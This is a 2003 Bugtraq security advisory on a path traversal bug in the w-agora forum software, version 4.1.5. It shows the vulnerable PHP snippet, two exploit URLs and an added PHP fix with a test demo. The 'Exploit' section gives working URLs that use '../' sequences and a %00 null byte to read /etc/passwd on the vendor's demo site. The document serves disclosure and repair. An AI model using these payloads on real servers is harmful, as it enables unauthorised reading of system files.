[28427] in bugtraq
Bug in w-agora
daemon@ATHENA.MIT.EDU (sonyy@2vias.com.ar)
Wed Jan 15 13:47:42 2003
Message-ID: <3E1695D2000002B0@mail.2vias.com.ar>
Date: Sun, 12 Jan 2003 12:03:12 -0300
From: sonyy@2vias.com.ar
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset="ISO-8859-1"
Content-Transfer-Encoding: 8bit
=======================
==Shell Security Team==
=======================
==============================
====Advisory For W-agora======
==============================
- Product : w-agora
- Tested version : version 4.1.5
- Website : http://www.w-agora.net
- Discovered by : Sonyy
- Vendor Status: informed
- Problem : A security vulnerability in W-agora
The bug :
==========
index.php :

    if (empty($bn)) {
        # No forum selected -> default to 'site' configuration
        $site = empty($site) ? "agora" : $site;
        $cfg_file = "${cfg_dir}/site_${site}.${ext}";
        $expnd = "all";
    } else {
        # $bn is taken from the request and placed in the path unchecked
        $cfg_file = "${cfg_dir}/${bn}.${ext}";
    }
Exploit :
=========
index.php
http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
And modules.php
http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
Any Questions :
==============
Sonyy --> Sonico60@hotmail.com
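
Added example, not part of the original advisory and not w-agora's own code: one way to build the configuration path from the snippet above so that neither "../" sequences nor a trailing %00 in bn can move it outside the configuration directory. The helper name resolve_cfg_file(), the 'php' extension and the demo directory are assumptions made for illustration.

```php
<?php
// Added example, not w-agora code. $cfg_dir, $ext, $bn and $site mirror the
// advisory's snippet; resolve_cfg_file() and the demo values are hypothetical.
function resolve_cfg_file(string $cfg_dir, string $ext, ?string $bn, ?string $site): ?string
{
    // Same branch as the original: no forum name -> site configuration.
    if ($bn === null || $bn === '') {
        $name = 'site_' . (($site === null || $site === '') ? 'agora' : $site);
    } else {
        $name = $bn;
    }

    // 1. Allowlist the name. This rejects "/", "\", "." and NUL bytes, so
    //    neither "../" sequences nor a %00 suffix truncation survive.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }

    // 2. Canonicalise and confirm the file really sits inside $cfg_dir
    //    (this also catches symlinks that point elsewhere).
    $base = realpath($cfg_dir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.' . $ext);
    if ($path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway config directory holding one forum config.
// 'php' stands in for $ext, whose value the advisory does not give.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cfg_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'fm_d1.php', "<?php // constructed\n");

// "\0" is the decoded form of the %00 in the advisory's URLs.
$inputs = ['fm_d1', "../../../../etc/passwd\0", '../fm_d1', 'fm_d1.php'];
foreach ($inputs as $bn) {
    $result = resolve_cfg_file($dir, 'php', $bn, 'demos');
    printf("%-34s %s\n", json_encode($bn), $result === null ? 'rejected' : 'accepted');
}

unlink($dir . DIRECTORY_SEPARATOR . 'fm_d1.php');
rmdir($dir);
```

The same two checks apply to the file parameter of modules.php, which the second URL shows being used in the same way.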